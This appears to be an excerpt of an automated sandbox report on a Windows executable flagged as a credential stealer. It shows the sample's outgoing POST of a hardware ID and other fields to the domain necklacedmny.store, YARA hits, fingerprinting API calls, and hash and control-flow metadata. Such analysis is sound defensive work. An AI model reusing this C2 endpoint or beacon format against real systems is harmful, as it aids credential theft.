2024-10-31 06:14:11 UTC | 285 | OUT | POST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 585899
                                                                      Host: necklacedmny.store
                                                                      2024-10-31 06:14:11 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 43 42 31 37 30 46 35 34 35 32 37 36 30 35 45 45 32 32 37 44 33 36 39 30 39 46 30 39 44 36 30 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7CB170F54527605EE227D36909F09D60--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
                                                                      2024-10-31 06:14:14 UTC1028INHTTP/1.1 200 OK
                                                                      Date: Thu, 31 Oct 2024 06:14:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=34j9gu7gtscio331arr8k2n1qv; expires=Mon, 24-Feb-2025 00:00:52 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pr%2FtT96twhYA5fbtTJwV65QD5I%2FBCuqC7m25J19DRh3fYHcadylbT2IMMNw5qm2ZoCRye8obqT1zBMBz1zf5pTgid%2F6NBahQNK%2FxDk1F%2BX%2FB9cUPlzJvyKzW%2F87f4u6f2EM8N9o%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8db180e4084a4635-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=987&sent=215&recv=621&lost=0&retrans=0&sent_bytes=2845&recv_bytes=588492&delivery_rate=2833659&cwnd=248&unsent_bytes=0&cid=b93823cf0b8baffd&ts=2557&x=0"


                                                                      Target ID:0
                                                                      Start time:02:14:00
                                                                      Start date:31/10/2024
                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                      Imagebase:0x600000
                                                                      File size:3'093'504 bytes
                                                                      MD5 hash:900B4F529C53A8740D16C0372DC2CA9A
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2086942025.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2086909296.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2102016717.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2087372814.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2102226797.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2101970932.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2102168913.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2103573537.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2061774988.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2074555367.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2061829602.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2062200123.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2103604047.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2075150921.00000000010A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                        Execution Graph

                                                                        Execution Coverage:4.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:59.2%
                                                                        Total number of Nodes:240
                                                                        Total number of Limit Nodes:23

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
                                                                        • API String ID: 0-600622405
                                                                        • Opcode ID: 39753dc9a14289faa83a43af611b52653f5b95f53f68f28f7025aec005e710e2
                                                                        • Instruction ID: 5874165300abce2a9d64c4d377ba99c487ef9fd58468dc8785366b8170e0abe1
                                                                        • Opcode Fuzzy Hash: 39753dc9a14289faa83a43af611b52653f5b95f53f68f28f7025aec005e710e2
                                                                        • Instruction Fuzzy Hash: 8CD1177164C3918FC728CF24D4903ABBBE2AFD1714F18896DE4D54B392D776890ACB92

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • SysAllocString.OLEAUT32(49FB4BE2), ref: 0063BD1E
                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0063BD67
                                                                        • SysFreeString.OLEAUT32(?), ref: 0063C0A4
                                                                        • SysFreeString.OLEAUT32(?), ref: 0063C0AA
                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,49FB4BE2,00000000,00000000,00000000,00000000), ref: 0063C0F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                        • String ID: WC$ZQ
                                                                        • API String ID: 1773362589-1722601914
                                                                        • Opcode ID: 1f2b409164a7c6d30ce08534f2f9fe198d47b4fa1a80a0d08fbe098040081da2
                                                                        • Instruction ID: 4c450017d67c522753375dcf850afc68ab9e6b6269fcedda252ce8b41d1bca91
                                                                        • Opcode Fuzzy Hash: 1f2b409164a7c6d30ce08534f2f9fe198d47b4fa1a80a0d08fbe098040081da2
                                                                        • Instruction Fuzzy Hash: 53C1CE76A08341ABE710CF60D855B5FBBE6FFC6314F10891CF194AB2A0D775990ACB86

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: B`$Ehrd$R`$b`$i[k]$necklacedmny.store$n|of$txLL$`
                                                                        • API String ID: 0-1253263819
                                                                        • Opcode ID: 374fd621f6711220731f767eaa90f59ac0c4600341fabbd3ab4a064c6d7ec24f
                                                                        • Instruction ID: 2f5ffa6c6400edf20d3af5e21d37155ea03bd3193b11fe0ac1d30641b3aa0c8a
                                                                        • Opcode Fuzzy Hash: 374fd621f6711220731f767eaa90f59ac0c4600341fabbd3ab4a064c6d7ec24f
                                                                        • Instruction Fuzzy Hash: DA02F775948350CFD314CF25EC9266BBBE3EB86704F185D2CE4859B352E7368909CBA2

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !m%k$#i4g$+e(c$@-+$g!~_$necklacedmny.store$v%r#$y)v'$yw
                                                                        • API String ID: 0-3070082895
                                                                        • Opcode ID: b08589e95c5642ea1d3dfb7f3323f356ec4568ee22bc7a916733cc7173e20a82
                                                                        • Instruction ID: 361dbd06fe90602174e6346d0da00984fcd033e4cca9787495c8450cf029d849
                                                                        • Opcode Fuzzy Hash: b08589e95c5642ea1d3dfb7f3323f356ec4568ee22bc7a916733cc7173e20a82
                                                                        • Instruction Fuzzy Hash: 8FF1A8B514C381DFE7248F24D8947ABBBF6EB86300F10AD2CE5C99B251D7B48845CB92
                                                                        APIs
                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0062F9FB
                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0062FABA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ComputerName
                                                                        • String ID: \X"Q$a|cI
                                                                        • API String ID: 3545744682-3233608862
                                                                        • Opcode ID: e67b2f440c595b600bf38ee95204c51c054e86a459b76fcf45b040a5a62a8759
                                                                        • Instruction ID: 839be864ee41e1bcbd4577055ec7b6c393c8ca1a5e4711f30dde0ea98c62eb7d
                                                                        • Opcode Fuzzy Hash: e67b2f440c595b600bf38ee95204c51c054e86a459b76fcf45b040a5a62a8759
                                                                        • Instruction Fuzzy Hash: 519208716047818FE7298F39C4A0762BBE2EF96314F18C6ADC4D68B792D779D806CB50

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DG$Dw$Mx$n~$wE$qVw
                                                                        • API String ID: 0-1111290910
                                                                        • Opcode ID: 02cf84956fd0fbb9b8b97d96d000c658fbf80b3c8e573b9ae5595a9e4060191c
                                                                        • Instruction ID: cebeb963c15e0008a8eb2b58669c194977794d46bf789313d7d58ed9dc2bb9f6
                                                                        • Opcode Fuzzy Hash: 02cf84956fd0fbb9b8b97d96d000c658fbf80b3c8e573b9ae5595a9e4060191c
                                                                        • Instruction Fuzzy Hash: AFF1CEB56083508FD314DF24D89166BBBE2EF96714F04892CF8958B391D778C909CF96

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 5c;e$>kjm$A'K)$Jg3i$S;W=$i#E%
                                                                        • API String ID: 0-468034204
                                                                        • Opcode ID: f95345a9c132fe295556885150602fea55d0d8e2a13174dfa9c9337683043d74
                                                                        • Instruction ID: 08de5ba95604134da74c549d622e7ea313786a671629de954ede33c7124d2dd5
                                                                        • Opcode Fuzzy Hash: f95345a9c132fe295556885150602fea55d0d8e2a13174dfa9c9337683043d74
                                                                        • Instruction Fuzzy Hash: 431275B8114700CFD3248F25D889FAA7BB2FB56310F1A86ACD59A9F6B2D7709405CF51

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $7$7$8$W
                                                                        • API String ID: 0-4210289531
                                                                        • Opcode ID: 2043a2fc198b3f81bd4d3fffc919c205bc5390c9b5c7649e00e56ec2bf70ab0a
                                                                        • Instruction ID: d0b431202368d6dc71d672c3491df0eb163733db36a311d17e493f5908ee84a7
                                                                        • Opcode Fuzzy Hash: 2043a2fc198b3f81bd4d3fffc919c205bc5390c9b5c7649e00e56ec2bf70ab0a
                                                                        • Instruction Fuzzy Hash: 6981F672A0D7908BD328CA3CD85535FBBD3ABD5324F1D8A2DE4E5873C2D67888058B42

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: >2%8$NFFV$]c\"
                                                                        • API String ID: 0-36263332
                                                                        • Opcode ID: 7469cf01f1ae8ab3b4c1da4b8c4111aa1e01987777e351a1184536e134638bee
                                                                        • Instruction ID: 3d3d5b0d72b8324395c35f18b5993a6a6ac9face030c2a34ebd1fe7054def546
                                                                        • Opcode Fuzzy Hash: 7469cf01f1ae8ab3b4c1da4b8c4111aa1e01987777e351a1184536e134638bee
                                                                        • Instruction Fuzzy Hash: 92F114745047828BD7258F2AC4A0762BBE2EFA3300F2C859DC4D68F793D7799806C7A1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 969 60cf90-60cfaf 970 60cfb0-60cfd3 969->970 970->970 971 60cfd5-60cfdf call 63ff20 970->971 974 60d1c4-60d1cf ExitProcess 971->974 975 60cfe5-60cfec call 638d10 971->975 978 60cff2-60d0a5 975->978 979 60d1bf call 640de0 975->979 982 60d0b0-60d0c2 978->982 979->974 982->982 983 60d0c4-60d0c7 982->983 984 60d19c-60d1a4 983->984 985 60d0cd-60d101 983->985 989 60d1a6-60d1ab 984->989 990 60d1ac-60d1b3 call 60e1a0 984->990 986 60d110-60d12d 985->986 986->986 988 60d12f-60d158 986->988 991 60d160-60d181 988->991 989->990 990->979 996 60d1b5 call 610b90 990->996 991->991 993 60d183-60d196 991->993 993->984 998 60d1ba call 60fa70 996->998 998->979
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(00000000), ref: 0060D1C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID: 89
                                                                        • API String ID: 621844428-155395596
                                                                        • Opcode ID: 157a97ecf0bfdc992fc3d903675494deded733d9c75caab7033a7bde524971a6
                                                                        • Instruction ID: b610d7bf388e0b1e05b64ff57df0d2fec0c7059d899bba07dadfe09a676bb2f4
                                                                        • Opcode Fuzzy Hash: 157a97ecf0bfdc992fc3d903675494deded733d9c75caab7033a7bde524971a6
                                                                        • Instruction Fuzzy Hash: E9516A7179872017E31CAA748C523BFABC2DF96714F098E2CD9C2EB3C1DD6888054792
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 804c2754968db1903abf679d93d17b4c71e28c4dfd799bb0b594be1fb06618a1
                                                                        • Instruction ID: 504d62b1bc5c90b33fce322329a1aaa1d3ed5d1169fecb2075b0c78c870476bb
                                                                        • Opcode Fuzzy Hash: 804c2754968db1903abf679d93d17b4c71e28c4dfd799bb0b594be1fb06618a1
                                                                        • Instruction Fuzzy Hash: 90D1F0B5504B418FD724CF28D8817A3B7E3EF45314F188A6CD49A8B796E734E885CB51
                                                                        APIs
                                                                        • CoUninitialize.COMBASE(?,00000001,00000001,?,?,?,00000001,00000001,00000003,00000001,00000001,?,?,?,00000001,00000001), ref: 00611379
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Uninitialize
                                                                        • String ID:
                                                                        • API String ID: 3861434553-0
                                                                        • Opcode ID: 7984f728dfc28b1921d092c0329c18351f5dd5211f2ab43a03e920c9fd6fc4e7
                                                                        • Instruction ID: ad51527c11e69f85dfa7ef10c3d5cb0c1d84170d9b3d97f41e8b765e59d742fc
                                                                        • Opcode Fuzzy Hash: 7984f728dfc28b1921d092c0329c18351f5dd5211f2ab43a03e920c9fd6fc4e7
                                                                        • Instruction Fuzzy Hash: D2B19EB5B407405BD354AF70ACD2A6B76A3AF86314F08953CE8474B783DF78E805875A
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0063E2A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: a97d5c6698ef60cdae8f65a3a10cc2a3dc6d074e63750b167ff8a80e33954c7d
                                                                        • Instruction ID: 4638019295d71190aa056d900161206c8d30358ab5eb817ac4d6503e23d9621c
                                                                        • Opcode Fuzzy Hash: a97d5c6698ef60cdae8f65a3a10cc2a3dc6d074e63750b167ff8a80e33954c7d
                                                                        • Instruction Fuzzy Hash: 6911447BE452508FC3108E68DCA2757BB6BEBDA711F1A057DD8809BA80CA355816CBD1
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(006446AD,005C003F,00000006,?,?,00000018,?,?,?), ref: 00640F3E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                        • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                        • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                        • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: @
                                                                        • API String ID: 2994545307-2766056989
                                                                        • Opcode ID: ce457ea52d5497708fbcdb8c183751ba29e2c99537e2943f1d6d90868d0f9014
                                                                        • Instruction ID: e80e2c7800e2e8eab45a5ea7498915fe554735f5b9aba92c651c8e3ac82cda99
                                                                        • Opcode Fuzzy Hash: ce457ea52d5497708fbcdb8c183751ba29e2c99537e2943f1d6d90868d0f9014
                                                                        • Instruction Fuzzy Hash: BB3124715083019BD318DF68D8D27ABB7F6FF95310F14992CEA8587380D7349948CB52
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 2926bd5aaa934aeae4a4f58511c126380ab6682ad4c31e2ef284183a05b25744
                                                                        • Instruction ID: b1c644583fb15b4b564ef3c6f11311491bceb13ffcae805c9a242476e38b4338
                                                                        • Opcode Fuzzy Hash: 2926bd5aaa934aeae4a4f58511c126380ab6682ad4c31e2ef284183a05b25744
                                                                        • Instruction Fuzzy Hash: 6DD18D727487114BDB148E6898817EB77E3EF95314F18892CE9858B3D1E374DD0ADB82
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fa4aae8c8d88b79d1010cf7cdcf28bf577fc2c5b5ce4adc70636b2f849b11af2
                                                                        • Instruction ID: 7d6960337cf3e0a64cfaaf2ce13d85d34e0a13e03f7657951d3388ef9d4b7acf
                                                                        • Opcode Fuzzy Hash: fa4aae8c8d88b79d1010cf7cdcf28bf577fc2c5b5ce4adc70636b2f849b11af2
                                                                        • Instruction Fuzzy Hash: A4B1387260C3808BD3149A38C85436ABBD3ABDA314F1C9A6EE6D6873D6DB74C9058357
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6da4f4a74f23f46dfe0632ab80e25fcf28afdc4721014a6698d7cf6f7ef5d5c1
                                                                        • Instruction ID: 32e1a37e565eb96f18ebb8ff52d33d2e204e4f62881039b2962d99a2d05b2592
                                                                        • Opcode Fuzzy Hash: 6da4f4a74f23f46dfe0632ab80e25fcf28afdc4721014a6698d7cf6f7ef5d5c1
